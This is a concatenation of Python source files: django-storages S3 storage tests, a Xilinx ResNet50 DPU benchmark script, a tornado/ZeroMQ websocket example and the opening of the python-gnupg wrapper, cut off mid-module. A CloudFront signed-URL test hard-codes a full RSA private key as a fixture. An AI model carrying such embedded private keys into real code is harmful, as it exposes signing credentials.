obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content,
ExtraArgs={
'ContentType': 'text/plain',
'ACL': 'private',
}
)
def test_storage_object_parameters_not_overwritten_by_default(self):
"""
Test saving a file with user defined ACL.
"""
name = 'test_storage_save.txt'
content = ContentFile('new content')
self.storage.default_acl = 'public-read'
self.storage.object_parameters = {'ACL': 'private'}
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content,
ExtraArgs={
'ContentType': 'text/plain',
'ACL': 'private',
}
)
def test_content_type(self):
"""
Test saving a file with a None content type.
"""
name = 'test_image.jpg'
content = ContentFile('data')
content.content_type = None
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content,
ExtraArgs={
'ContentType': 'image/jpeg',
}
)
def test_storage_save_gzipped(self):
"""
Test saving a gzipped file
"""
name = 'test_storage_save.gz'
content = ContentFile("I am gzip'd")
self.storage.save(name, content)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
content,
ExtraArgs={
'ContentType': 'application/octet-stream',
'ContentEncoding': 'gzip',
}
)
def test_storage_save_gzip(self):
"""
Test saving a file with gzip enabled.
"""
self.storage.gzip = True
name = 'test_storage_save.css'
content = ContentFile("I should be gzip'd")
self.storage.save(name, content)
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
mock.ANY,
ExtraArgs={
'ContentType': 'text/css',
'ContentEncoding': 'gzip',
}
)
args, kwargs = obj.upload_fileobj.call_args
content = args[0]
zfile = gzip.GzipFile(mode='rb', fileobj=content)
self.assertEqual(zfile.read(), b"I should be gzip'd")
def test_storage_save_gzip_twice(self):
"""
Test saving the same file content twice with gzip enabled.
"""
# Given
self.storage.gzip = True
name = 'test_storage_save.css'
content = ContentFile("I should be gzip'd")
# When
self.storage.save(name, content)
self.storage.save('test_storage_save_2.css', content)
# Then
obj = self.storage.bucket.Object.return_value
obj.upload_fileobj.assert_called_with(
mock.ANY,
ExtraArgs={
'ContentType': 'text/css',
'ContentEncoding': 'gzip',
}
)
args, kwargs = obj.upload_fileobj.call_args
content = args[0]
zfile = gzip.GzipFile(mode='rb', fileobj=content)
self.assertEqual(zfile.read(), b"I should be gzip'd")
def test_compress_content_len(self):
"""
Test that file returned by _compress_content() is readable.
"""
self.storage.gzip = True
content = ContentFile("I should be gzip'd")
content = self.storage._compress_content(content)
self.assertTrue(len(content.read()) > 0)
def test_storage_open_read_string(self):
"""
Test opening a file in "r" mode (ie reading as string, not bytes)
"""
name = 'test_open_read_string.txt'
content_str = self.storage.open(name, "r").read()
self.assertEqual(content_str, "")
def test_storage_open_write(self):
"""
Test opening a file in write mode
"""
name = 'test_open_for_writïng.txt'
content = 'new content'
# Set the encryption flag used for multipart uploads
self.storage.object_parameters = {
'ServerSideEncryption': 'AES256',
'StorageClass': 'REDUCED_REDUNDANCY',
'ACL': 'public-read',
}
file = self.storage.open(name, 'w')
self.storage.bucket.Object.assert_called_with(name)
obj = self.storage.bucket.Object.return_value
# Set the name of the mock object
obj.key = name
file.write(content)
obj.initiate_multipart_upload.assert_called_with(
ACL='public-read',
ContentType='text/plain',
ServerSideEncryption='AES256',
StorageClass='REDUCED_REDUNDANCY'
)
# Save the internal file before closing
multipart = obj.initiate_multipart_upload.return_value
multipart.parts.all.return_value = [mock.MagicMock(e_tag='123', part_number=1)]
file.close()
multipart.Part.assert_called_with(1)
part = multipart.Part.return_value
part.upload.assert_called_with(Body=content.encode())
multipart.complete.assert_called_once_with(
MultipartUpload={'Parts': [{'ETag': '123', 'PartNumber': 1}]})
def test_write_bytearray(self):
"""Test that bytearray write exactly (no extra "bytearray" from stringify)."""
name = "saved_file.bin"
content = bytearray(b"content")
file = self.storage.open(name, "wb")
obj = self.storage.bucket.Object.return_value
# Set the name of the mock object
obj.key = name
bytes_written = file.write(content)
self.assertEqual(len(content), bytes_written)
def test_storage_open_no_write(self):
"""
Test opening file in write mode and closing without writing.
A file should be created as by obj.put(...).
"""
name = 'test_open_no_write.txt'
# Set the encryption flag used for puts
self.storage.object_parameters = {
'ServerSideEncryption': 'AES256',
'StorageClass': 'REDUCED_REDUNDANCY',
}
file = self.storage.open(name, 'w')
self.storage.bucket.Object.assert_called_with(name)
obj = self.storage.bucket.Object.return_value
obj.load.side_effect = ClientError({'Error': {},
'ResponseMetadata': {'HTTPStatusCode': 404}},
'head_bucket')
# Set the name of the mock object
obj.key = name
# Save the internal file before closing
file.close()
obj.load.assert_called_once_with()
obj.put.assert_called_once_with(
Body=b"",
ContentType='text/plain',
ServerSideEncryption='AES256',
StorageClass='REDUCED_REDUNDANCY'
)
def test_storage_open_no_overwrite_existing(self):
"""
Test opening an existing file in write mode and closing without writing.
"""
name = 'test_open_no_overwrite_existing.txt'
# Set the encryption flag used for puts
self.storage.object_parameters = {
'ServerSideEncryption': 'AES256',
'StorageClass': 'REDUCED_REDUNDANCY',
}
file = self.storage.open(name, 'w')
self.storage.bucket.Object.assert_called_with(name)
obj = self.storage.bucket.Object.return_value
# Set the name of the mock object
obj.key = name
# Save the internal file before closing
file.close()
obj.load.assert_called_once_with()
obj.put.assert_not_called()
def test_storage_write_beyond_buffer_size(self):
"""
Test writing content that exceeds the buffer size
"""
name = 'test_open_for_writïng_beyond_buffer_size.txt'
# Set the encryption flag used for multipart uploads
self.storage.object_parameters = {
'ServerSideEncryption': 'AES256',
'StorageClass': 'REDUCED_REDUNDANCY',
}
file = self.storage.open(name, 'w')
self.storage.bucket.Object.assert_called_with(name)
obj = self.storage.bucket.Object.return_value
# Set the name of the mock object
obj.key = name
# Initiate the multipart upload
file.write('')
obj.initiate_multipart_upload.assert_called_with(
ContentType='text/plain',
ServerSideEncryption='AES256',
StorageClass='REDUCED_REDUNDANCY'
)
multipart = obj.initiate_multipart_upload.return_value
# Write content at least twice as long as the buffer size
written_content = ''
counter = 1
while len(written_content) < 2 * file.buffer_size:
content = 'hello, aws {counter}\n'.format(counter=counter)
# Write more than just a few bytes in each iteration to keep the
# test reasonably fast
content += '*' * int(file.buffer_size / 10)
file.write(content)
written_content += content
counter += 1
# Save the internal file before closing
multipart.parts.all.return_value = [
mock.MagicMock(e_tag='123', part_number=1),
mock.MagicMock(e_tag='456', part_number=2)
]
file.close()
self.assertListEqual(
multipart.Part.call_args_list,
[mock.call(1), mock.call(2)]
)
part = multipart.Part.return_value
uploaded_content = ''.join(
args_list[1]['Body'].decode()
for args_list in part.upload.call_args_list
)
self.assertEqual(uploaded_content, written_content)
multipart.complete.assert_called_once_with(
MultipartUpload={'Parts': [
{'ETag': '123', 'PartNumber': 1},
{'ETag': '456', 'PartNumber': 2},
]}
)
def test_storage_exists(self):
self.assertTrue(self.storage.exists("file.txt"))
self.storage.connection.meta.client.head_object.assert_called_with(
Bucket=self.storage.bucket_name,
Key="file.txt",
)
def test_storage_exists_false(self):
self.storage.connection.meta.client.head_object.side_effect = ClientError(
{'Error': {'Code': '404', 'Message': 'Not Found'}},
'HeadObject',
)
self.assertFalse(self.storage.exists("file.txt"))
self.storage.connection.meta.client.head_object.assert_called_with(
Bucket=self.storage.bucket_name,
Key='file.txt',
)
def test_storage_delete(self):
self.storage.delete("path/to/file.txt")
self.storage.bucket.Object.assert_called_with('path/to/file.txt')
self.storage.bucket.Object.return_value.delete.assert_called_with()
def test_storage_listdir_base(self):
# Files:
# some/path/1.txt
# 2.txt
# other/path/3.txt
# 4.txt
pages = [
{
'CommonPrefixes': [
{'Prefix': 'some'},
{'Prefix': 'other'},
],
'Contents': [
{'Key': '2.txt'},
{'Key': '4.txt'},
],
},
]
paginator = mock.MagicMock()
paginator.paginate.return_value = pages
self.storage._connections.connection.meta.client.get_paginator.return_value = paginator
dirs, files = self.storage.listdir('')
paginator.paginate.assert_called_with(Bucket=None, Delimiter='/', Prefix='')
self.assertEqual(dirs, ['some', 'other'])
self.assertEqual(files, ['2.txt', '4.txt'])
def test_storage_listdir_subdir(self):
# Files:
# some/path/1.txt
# some/2.txt
pages = [
{
'CommonPrefixes': [
{'Prefix': 'some/path'},
],
'Contents': [
{'Key': 'some/2.txt'},
],
},
]
paginator = mock.MagicMock()
paginator.paginate.return_value = pages
self.storage._connections.connection.meta.client.get_paginator.return_value = paginator
dirs, files = self.storage.listdir('some/')
paginator.paginate.assert_called_with(Bucket=None, Delimiter='/', Prefix='some/')
self.assertEqual(dirs, ['path'])
self.assertEqual(files, ['2.txt'])
def test_storage_size(self):
obj = self.storage.bucket.Object.return_value
obj.content_length = 4098
name = 'file.txt'
self.assertEqual(self.storage.size(name), obj.content_length)
def test_storage_mtime(self):
# Test both USE_TZ cases
for use_tz in (True, False):
with self.settings(USE_TZ=use_tz):
self._test_storage_mtime(use_tz)
def _test_storage_mtime(self, use_tz):
obj = self.storage.bucket.Object.return_value
obj.last_modified = datetime.now(utc)
name = 'file.txt'
self.assertFalse(
is_aware(self.storage.modified_time(name)),
'Naive datetime object expected from modified_time()'
)
self.assertIs(
settings.USE_TZ,
is_aware(self.storage.get_modified_time(name)),
'{} datetime object expected from get_modified_time() when USE_TZ={}'.format(
('Naive', 'Aware')[settings.USE_TZ],
settings.USE_TZ
)
)
def test_storage_url(self):
name = 'test_storage_size.txt'
url = 'http://aws.amazon.com/%s' % name
self.storage.bucket.meta.client.generate_presigned_url.return_value = url
self.storage.bucket.name = 'bucket'
self.assertEqual(self.storage.url(name), url)
self.storage.bucket.meta.client.generate_presigned_url.assert_called_with(
'get_object',
Params={'Bucket': self.storage.bucket.name, 'Key': name},
ExpiresIn=self.storage.querystring_expire,
HttpMethod=None,
)
custom_expire = 123
self.assertEqual(self.storage.url(name, expire=custom_expire), url)
self.storage.bucket.meta.client.generate_presigned_url.assert_called_with(
'get_object',
Params={'Bucket': self.storage.bucket.name, 'Key': name},
ExpiresIn=custom_expire,
HttpMethod=None,
)
custom_method = 'HEAD'
self.assertEqual(self.storage.url(name, http_method=custom_method), url)
self.storage.bucket.meta.client.generate_presigned_url.assert_called_with(
'get_object',
Params={'Bucket': self.storage.bucket.name, 'Key': name},
ExpiresIn=self.storage.querystring_expire,
HttpMethod=custom_method,
)
def test_storage_url_custom_domain_signed_urls(self):
key_id = 'test-key'
filename = 'file.txt'
pem = dedent(
'''\
-----BEGIN RSA PRIVATE KEY-----
MIICWwIBAAKBgQCXVuwcMk+JmVSKuQ1K4dZx4Z1dEcRQgTlqvhAyljIpttXlZh2/
fD3GkJCiqfwEmo+cdNK/LFzRj/CX8Wz1z1lH2USONpG6sAkotkatCbejiItDu5y6
janGJHfuWXu6B/o9gwZylU1gIsePY3lLNk+r9QhXUO4jXw6zLJftVwKPhQIDAQAB
AoGAbpkRV9HUmoQ5al+uPSkp5HOy4s8XHpYxdbaMc8ubwSxiyJCF8OhE5RXE/Xso
N90UUox1b0xmUKfWddPzgvgTD/Ub7D6Ukf+nVWDX60tWgNxICAUHptGL3tWweaAy
H+0+vZ0TzvTt9r00vW0FzO7F8X9/Rs1ntDRLtF3RCCxdq0kCQQDHFu+t811lCvy/
67rMEKGvNsNNSTrzOrNr3PqUrCnOrzKazjFVjsKv5VzI/U+rXGYKWJsMpuCFiHZ3
DILUC09TAkEAwpm2S6MN6pzn9eY6pmhOxZ+GQGGRUkKZfC1GDxaRSRb8sKTjptYw
WSemJSxiDzdj3Po2hF0lbhkpJgUq6xnCxwJAZgHHfn5CLSJrDD7Q7/vZi/foK3JJ
BRTfl3Wa4pAvv5meuRjKyEakVBGV79lyd5+ZHNX3Y40hXunjoO3FHrZIxwJAdRzu
waxahrRxQOKSr20c4wAzWnGddIUSO9I/VHs/al5EKsbBHrnOlQkwizSfuwqZtfZ7
csNf8FeCFRiNELoLJwJAZxWBE2+8J9VW9AQ0SE7j4FyM/B8FvRhF5PLAAsw/OxHO
SxiFP7Ptdac1tm5H5zOqaqSHWphI19HNNilXKmxuCA==
-----END RSA PRIVATE KEY-----'''
).encode('ascii')
url = 'https://mock.cloudfront.net/file.txt'
signed_url = url + '?Expires=3600&Signature=DbqVgh3FHtttQxof214tSAVE8Nqn3Q4Ii7eR3iykbOqAPbV89HC3EB~0CWxarpLNtbfosS5LxiP5EutriM7E8uR4Gm~UVY-PFUjPcwqdnmAiKJF0EVs7koJcMR8MKDStuWfFKVUPJ8H7ORYTOrixyHBV2NOrpI6SN5UX6ctNM50_&Key-Pair-Id=test-key' # noqa
self.storage.custom_domain = "mock.cloudfront.net"
for pem_to_signer in (
s3boto3._use_cryptography_signer(),
s3boto3._use_rsa_signer()):
self.storage.cloudfront_signer = pem_to_signer(key_id, pem)
self.storage.querystring_auth = False
self.assertEqual(self.storage.url(filename), url)
self.storage.querystring_auth = True
with mock.patch('storages.backends.s3boto3.datetime') as mock_datetime:
mock_datetime.utcnow.return_value = datetime.utcfromtimestamp(0)
self.assertEqual(self.storage.url(filename), signed_url)
def test_generated_url_is_encoded(self):
self.storage.custom_domain = "mock.cloudfront.net"
filename = "whacky & filename.mp4"
url = self.storage.url(filename)
parsed_url = urlparse(url)
self.assertEqual(parsed_url.path,
"/whacky%20%26%20filename.mp4")
self.assertFalse(self.storage.bucket.meta.client.generate_presigned_url.called)
def test_special_characters(self):
self.storage.custom_domain = "mock.cloudfront.net"
name = "ãlöhâ.jpg"
content = ContentFile('new content')
self.storage.save(name, content)
self.storage.bucket.Object.assert_called_once_with(name)
url = self.storage.url(name)
parsed_url = urlparse(url)
self.assertEqual(parsed_url.path, "/%C3%A3l%C3%B6h%C3%A2.jpg")
def test_strip_signing_parameters(self):
expected = 'http://bucket.s3-aws-region.amazonaws.com/foo/bar'
self.assertEqual(self.storage._strip_signing_parameters(
'%s?X-Amz-Date=12345678&X-Amz-Signature=Signature' % expected), expected)
self.assertEqual(self.storage._strip_signing_parameters(
'%s?expires=12345678&signature=Signature' % expected), expected)
@skipIf(threading is None, 'Test requires threading')
def test_connection_threading(self):
connections = []
def thread_storage_connection():
connections.append(self.storage.connection)
for x in range(2):
t = threading.Thread(target=thread_storage_connection)
t.start()
t.join()
# Connection for each thread needs to be unique
self.assertIsNot(connections[0], connections[1])
def test_location_leading_slash(self):
msg = (
"S3Boto3Storage.location cannot begin with a leading slash. "
"Found '/'. Use '' instead."
)
with self.assertRaises(ImproperlyConfigured, msg=msg):
s3boto3.S3Boto3Storage(location='/')
def test_override_settings(self):
with override_settings(AWS_LOCATION='foo1'):
storage = s3boto3.S3Boto3Storage()
self.assertEqual(storage.location, 'foo1')
with override_settings(AWS_LOCATION='foo2'):
storage = s3boto3.S3Boto3Storage()
self.assertEqual(storage.location, 'foo2')
def test_override_class_variable(self):
class MyStorage1(s3boto3.S3Boto3Storage):
location = 'foo1'
storage = MyStorage1()
self.assertEqual(storage.location, 'foo1')
class MyStorage2(s3boto3.S3Boto3Storage):
location = 'foo2'
storage = MyStorage2()
self.assertEqual(storage.location, 'foo2')
def test_override_init_argument(self):
storage = s3boto3.S3Boto3Storage(location='foo1')
self.assertEqual(storage.location, 'foo1')
storage = s3boto3.S3Boto3Storage(location='foo2')
self.assertEqual(storage.location, 'foo2')
|
resnet50.py
|
'''
Copyright 2019 Xilinx Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from ctypes import *
import cv2
import numpy as np
import runner
import xir.graph
import pathlib
import xir.subgraph
import os
import input_fn
import math
import threading
import time
import sys
'''
Calculate softmax
data: data to be calculated
size: data size
return: softamx result
'''
def CPUCalcSoftmax(data,size):
sum=0.0
result = [0 for i in range(size)]
for i in range(size):
result[i] = math.exp(data[i])
sum +=result[i]
for i in range(size):
result[i] /=sum
return result
def get_script_directory():
path = os.getcwd()
return path
'''
Get topk results according to its probability
datain: data result of softmax
filePath: filePath in witch that records the infotmation of kinds
'''
def TopK(datain,size,filePath):
cnt=[i for i in range(size) ]
pair=zip(datain,cnt)
pair=sorted(pair,reverse=True)
softmax_new,cnt_new=zip(*pair)
fp=open(filePath, "r")
data1=fp.readlines()
fp.close()
for i in range(5):
flag=0
for line in data1:
if flag==cnt_new[i]:
print("Top[%d] %f %s" %(i, (softmax_new[i]),(line.strip)("\n")))
flag=flag+1
SCRIPT_DIR = get_script_directory()
calib_image_dir = SCRIPT_DIR + "/../images/"
IMAGE_WIDTH = 224
IMAGE_HEIGHT = 224
global threadnum
threadnum = 0
'''
run resnt50 with batch
dpu: dpu runner
img: imagelist to be run
cnt: threadnum
'''
def runResnet50(dpu,img,cnt):
"""get tensor"""
inputTensors = dpu.get_input_tensors()
outputTensors = dpu.get_output_tensors()
outputHeight = outputTensors[0].dims[1]
outputWidth = outputTensors[0].dims[2]
outputChannel = outputTensors[0].dims[3]
outputSize = outputHeight*outputWidth*outputChannel
softmax = np.empty(outputSize)
batchSize = inputTensors[0].dims[0]
n_of_images = len(img)
count = 0
while count < cnt:
runSize = batchSize
shapeIn = (runSize,) + tuple([inputTensors[0].dims[i] for i in range(inputTensors[0].ndim)][1:])
"""prepare batch input/output """
outputData = []
inputData = []
outputData.append(np.empty((runSize,outputHeight,outputWidth,outputChannel), dtype = np.float32, order = 'C'))
inputData.append(np.empty((shapeIn), dtype = np.float32, order = 'C'))
"""init input image to input buffer """
for j in range(runSize):
imageRun = inputData[0]
imageRun[j,...] = img[(count+j)% n_of_images].reshape(inputTensors[0].dims[1],inputTensors[0].dims[2],inputTensors[0].dims[3])
"""run with batch """
job_id = dpu.execute_async(inputData,outputData)
dpu.wait(job_id)
for j in range(len(outputData)):
outputData[j] = outputData[j].reshape(runSize, outputSize)
"""softmax calculate with batch """
"""Benchmark DPU FPS performance over Vitis AI APIs execute_async() and wait() """
"""Uncomment the following code snippet to include softmax calculation for model’s end-to-end FPS evaluation """
#for j in range(runSize):
# softmax = CPUCalcSoftmax(outputData[0][j], outputSize)
count = count + runSize
def get_subgraph (g):
sub = []
root = g.get_root_subgraph()
sub = [ s for s in root.children
if s.metadata.get_attr_str ("device") == "DPU"]
return sub
def main(argv):
global threadnum
listimage=os.listdir(calib_image_dir)
threadAll = []
threadnum = int(argv[1])
i = 0
global runTotall
runTotall = len(listimage)
g = xir.graph.Graph.deserialize(pathlib.Path(argv[2]))
subgraphs = get_subgraph (g)
assert len(subgraphs) == 1 # only one DPU kernel
all_dpu_runners = [];
for i in range(int(threadnum)):
all_dpu_runners.append(runner.Runner(subgraphs[0], "run"));
"""image list to be run """
img = []
for i in range(runTotall):
path = os.path.join(calib_image_dir,listimage[i])
img.append(input_fn.preprocess_fn(path))
cnt = 360 ;
"""run with batch """
time_start = time.time()
for i in range(int(threadnum)):
t1 = threading.Thread(target=runResnet50, args=(all_dpu_runners[i], img, cnt))
threadAll.append(t1)
for x in threadAll:
x.start()
for x in threadAll:
x.join()
time_end = time.time()
timetotal = time_end - time_start
total_frames = cnt*int(threadnum)
fps = float(total_frames / timetotal)
print("FPS=%.2f, total frames = %.2f , time=%.6f seconds" %(fps,total_frames, timetotal))
if __name__ == "__main__":
if len(sys.argv) != 3:
print("please input thread number and model file.")
else :
main(sys.argv)
|
tornadosrv.py
|
"""Async web request example with tornado.
Requests to localhost:8888 will be relayed via 0MQ to a slow responder,
who will take 1-5 seconds to respond. The tornado app will remain responsive
duriung this time, and when the worker replies, the web request will finish.
A '.' is printed every 100ms to demonstrate that the zmq request is not blocking
the event loop.
"""
import sys
import random
import threading
import time
import zmq
from zmq.eventloop import ioloop, zmqstream
"""
ioloop.install() must be called prior to instantiating *any* tornado objects,
and ideally before importing anything from tornado, just to be safe.
install() sets the singleton instance of tornado.ioloop.IOLoop with zmq's
IOLoop. If this is not done properly, multiple IOLoop instances may be
created, which will have the effect of some subset of handlers never being
called, because only one loop will be running.
"""
ioloop.install()
import tornado
from tornado import web
from tornado import websocket
class EchoWebSocket(websocket.WebSocketHandler):
def open(self):
print "WebSocket opened"
def on_message(self, message):
self.write_message(u"You said: " + message)
def on_close(self):
print "WebSocket closed"
import cPickle as pickle
def slow_responder():
"""thread for slowly responding to replies."""
ctx = zmq.Context.instance()
socket = ctx.socket(zmq.REP)
socket.linger = 0
socket.bind('tcp://127.0.0.1:5555')
i=0
while True:
msg = socket.recv()
print "\nworker received %r\n" % msg
time.sleep(random.randint(1,5))
socket.send(msg + " to you too, #%i" % i)
i+=1
def dot():
"""callback for showing that IOLoop is still responsive while we wait"""
sys.stdout.write('.')
sys.stdout.flush()
def printer(msg):
print (msg)
class TestHandler(web.RequestHandler):
@web.asynchronous
def get(self):
ctx = zmq.Context.instance()
s = ctx.socket(zmq.REQ)
s.connect('tcp://127.0.0.1:5555')
# send request to worker
s.send('hello')
loop = ioloop.IOLoop.instance()
self.stream = zmqstream.ZMQStream(s)
self.stream.on_recv(self.handle_reply)
def handle_reply(self, msg):
# finish web request with worker's reply
reply = msg[0]
print "\nfinishing with %r\n" % reply,
self.stream.close()
self.write(reply)
self.finish()
def main():
worker = threading.Thread(target=slow_responder)
worker.daemon=True
worker.start()
#application = web.Application([(r"/", TestHandler)])
application = web.Application([(r"/websocket", EchoWebSocket)])
beat = ioloop.PeriodicCallback(dot, 100)
beat.start()
application.listen(8888)
try:
ioloop.IOLoop.instance().start()
except KeyboardInterrupt:
print ' Interrupted'
if __name__ == "__main__":
main()
|
gnupg.py
|
""" A wrapper for the 'gpg' command::
Portions of this module are derived from A.M. Kuchling's well-designed
GPG.py, using Richard Jones' updated version 1.3, which can be found
in the pycrypto CVS repository on Sourceforge:
http://pycrypto.cvs.sourceforge.net/viewvc/pycrypto/gpg/GPG.py
This module is *not* forward-compatible with amk's; some of the
old interface has changed. For instance, since I've added decrypt
functionality, I elected to initialize with a 'gnupghome' argument
instead of 'keyring', so that gpg can find both the public and secret
keyrings. I've also altered some of the returned objects in order for
the caller to not have to know as much about the internals of the
result classes.
While the rest of ISconf is released under the GPL, I am releasing
this single file under the same terms that A.M. Kuchling used for
pycrypto.
Steve Traugott, stevegt@terraluna.org
Thu Jun 23 21:27:20 PDT 2005
This version of the module has been modified from Steve Traugott's version
(see http://trac.t7a.org/isconf/browser/trunk/lib/python/isconf/GPG.py) by
Vinay Sajip to make use of the subprocess module (Steve's version uses os.fork()
and so does not work on Windows). Renamed to gnupg.py to avoid confusion with
the previous versions.
Modifications Copyright (C) 2008-2018 Vinay Sajip. All rights reserved.
A unittest harness (test_gnupg.py) has also been added.
"""
__version__ = "0.4.3"
__author__ = "Vinay Sajip"
__date__ = "$13-Jun-2018 12:11:43$"
try:
from io import StringIO
except ImportError: # pragma: no cover
from cStringIO import StringIO
import codecs
import locale
import logging
import os
import re
import socket
from subprocess import Popen
from subprocess import PIPE
import sys
import threading
STARTUPINFO = None
if os.name == 'nt': # pragma: no cover
try:
from subprocess import STARTUPINFO, STARTF_USESHOWWINDOW, SW_HIDE
except ImportError:
STARTUPINFO = None
try:
import logging.NullHandler as NullHandler
except ImportError:
class NullHandler(logging.Handler):
def handle(self, record):
pass
try:
unicode
_py3k = False
string_types = basestring
text_type = unicode
except NameError:
_py3k = True
string_types = str
text_type = str
logger = logging.getLogger(__name__)
if not logger.handlers:
logger.addHandler(NullHandler())
# We use the test below because it works for Jython as well as CPython
if os.path.__name__ == 'ntpath': # pragma: no cover
# On Windows, we don't need shell quoting, other than worrying about
# paths with spaces in them.
def shell_quote(s):
return '"%s"' % s
else:
# Section copied from sarge
# This regex determines which shell input needs quoting
# because it may be unsafe
UNSAFE = re.compile(r'[^\w%+,./:=@-]')
def shell_quote(s):
"""
Quote text so that it is safe for Posix command shells.
For example, "*.py" would be converted to "'*.py'". If the text is
considered safe it is returned unquoted.
:param s: The value to quote
:type s: str (or unicode on 2.x)
:return: A safe version of the input, from the point of view of Posix
command shells
:rtype: The passed-in type
"""
if not isinstance(s, string_types): # pragma: no cover
raise TypeError('Expected string type, got %s' % type(s))
if not s:
result = "''"
elif not UNSAFE.search(s):
result = s
else:
result = "'%s'" % s.replace("'", r"'\''")
return result
# end of sarge code
# Now that we use shell=False, we shouldn't need to quote arguments.
# Use no_quote instead of shell_quote to remind us of where quoting
# was needed. However, note that we still need, on 2.x, to encode any
# Unicode argument with the file system encoding - see Issue #41 and
# Python issue #1759845 ("subprocess.call fails with unicode strings in
# command line").
# Allows the encoding used to be overridden in special cases by setting
# this module attribute appropriately.
fsencoding = sys.getfilesystemencoding()
def no_quote(s):
if not _py3k and isinstance(s, text_type):
s = s.encode(fsencoding)
return s
def _copy_data(instream, outstream):
# Copy one stream to another
sent = 0
if hasattr(sys.stdin, 'encoding'):
enc = sys.stdin.encoding
else: # pragma: no cover
enc = 'ascii'
while True:
# See issue #39: read can fail when e.g. a text stream is provided
# for what is actually a binary file
try:
data = instream.read(1024)
except UnicodeError:
logger.warning('Exception occurred while reading', exc_info=1)
break
if not data:
break
sent += len(data)
# logger.debug("sending chunk (%d): %r", sent, data[:256])
try:
outstream.write(data)
except UnicodeError: # pragma: no cover
outstream.write(data.encode(enc))
except:
# Can sometimes get 'broken pipe' errors even when the data has all
# been sent
logger.exception('Error sending data')
break
try:
outstream.close()
except IOError: # pragma: no cover
logger.warning('Exception occurred while closing: ignored', exc_info=1)
logger.debug("closed output, %d bytes sent", sent)
def _threaded_copy_data(instream, outstream):
wr = threading.Thread(target=_copy_data, args=(instream, outstream))
wr.setDaemon(True)
logger.debug('data copier: %r, %r, %r', wr, instream, outstream)
wr.start()
return wr
def _write_passphrase(stream, passphrase, encoding):
passphrase = '%s\n' % passphrase
passphrase = passphrase.encode(encoding)
stream.write(passphrase)
logger.debug('Wrote passphrase')
def _is_sequence(instance):
return isinstance(instance, (list, tuple, set, frozenset))
def _make_memory_stream(s):
try:
from io import BytesIO
rv = BytesIO(s)
except ImportError: # pragma: no cover
rv = StringIO(s)
return rv
def _make_binary_stream(s, encoding):
if _py3k:
if isinstance(s, str):
s = s.encode(encoding)
else:
if type(s) is not str:
s = s.encode(encoding)
return _make_memory_stream(s)
class Verify(object):
"Handle status messages for --verify"
TRUST_UNDEFINED = 0
TRUST_NEVER = 1
TRUST_MARGINAL = 2
TRUST_FULLY = 3
TRUST_ULTIMATE = 4
TRUST_LEVELS = {
"TRUST_UNDEFINED" : TRUST_UNDEFINED,
"TRUST_NEVER" : TRUST_NEVER,
"TRUST_MARGINAL" : TRUST_MARGINAL,
"TRUST_FULLY" : TRUST_FULLY,
"TRUST_ULTIMATE" : TRUST_ULTIMATE,
}
# for now, just the most common error codes. This can be expanded as and
# when reports come in of other errors.
GPG_SYSTEM_ERROR_CODES = {
1: 'permission denied',
35: 'file exists',
81: 'file not found',
97: 'not a directory',
}
GPG_ERROR_CODES = {
11: 'incorrect passphrase',
}
def __init__(self, gpg):
self.gpg = gpg
self.valid = False
self.fingerprint = self.creation_date = self.timestamp = None
self.signature_id = self.key_id = None
self.username = None
self.key_id = None
self.key_status = None
self.status = None
self.pubkey_fingerprint = None
self.expire_timestamp = None
self.sig_timestamp = None
self.trust_text = None
self.trust_level = None
def __nonzero__(self):
return self.valid
__bool__ = __nonzero__
def handle_status(self, key, value):
if key in self.TRUST_LEVELS:
self.trust_text = key
self.trust_level = self.TRUST_LEVELS[key]
elif key in ("WARNING", "ERROR"):
logger.warning('potential problem: %s: %s', key, value)
elif key == "BADSIG": # pragma: no cover
self.valid = False
self.status = 'signature bad'
self.key_id, self.username = value.split(None, 1)
elif key == "ERRSIG": # pragma: no cover
self.valid = False
(self.key_id,
algo, hash_algo,
cls,
self.timestamp) = value.split()[:5]
self.status = 'signature error'
elif key == "EXPSIG": # pragma: no cover
self.valid = False
self.status = 'signature expired'
self.key_id, self.username = value.split(None, 1)
elif key == "GOODSIG":
self.valid = True
self.status = 'signature good'
self.key_id, self.username = value.split(None, 1)
elif key == "VALIDSIG":
(self.fingerprint,
self.creation_date,
self.sig_timestamp,
self.expire_timestamp) = value.split()[:4]
# may be different if signature is made with a subkey
self.pubkey_fingerprint = value.split()[-1]
self.status = 'signature valid'
elif key == "SIG_ID":
(self.signature_id,
self.creation_date, self.timestamp) = value.split()
elif key == "DECRYPTION_FAILED": # pragma: no cover
self.valid = False
self.key_id = value
self.status = 'decryption failed'
elif key == "NO_PUBKEY": # pragma: no cover
self.valid = False
self.key_id = value
self.status = 'no public key'
elif key in ("EXPKEYSIG", "REVKEYSIG"): # pragma: no cover
# signed with expired or revoked key
self.valid = False
self.key_id = value.split()[0]
if key == "EXPKEYSIG":
self.key_status = 'signing key has expired'
else:
self.key_status = 'signing key was revoked'
self.status = self.key_status
elif key in ("UNEXPECTED", "FAILURE"): # pragma: no cover
self.valid = False
self.key_id = value
if key == "UNEXPECTED":
self.status = 'unexpected data'
else:
# N.B. there might be other reasons. For example, if an output
# file can't be created - /dev/null/foo will lead to a
# "not a directory" error, but which is not sent as a status
# message with the [GNUPG:] prefix. Similarly if you try to
# write to "/etc/foo" as a non-root user, a "permission denied"
# error will be sent as a non-status message.
message = 'error - %s' % value
parts = value.split()
if parts[-1].isdigit():
code = int(parts[-1])
system_error = bool(code & 0x8000)
code = code & 0x7FFF
if system_error:
mapping = self.GPG_SYSTEM_ERROR_CODES
else:
mapping = self.GPG_ERROR_CODES
if code in mapping:
message = mapping[code]
if not self.status:
self.status = message
elif key in ("DECRYPTION_INFO", "PLAINTEXT", "PLAINTEXT_LENGTH",
"NO_SECKEY", "BEGIN_SIGNING"):
pass
else: # pragma: no cover
logger.debug('message ignored: %s, %s', key, value)
class ImportResult(object):
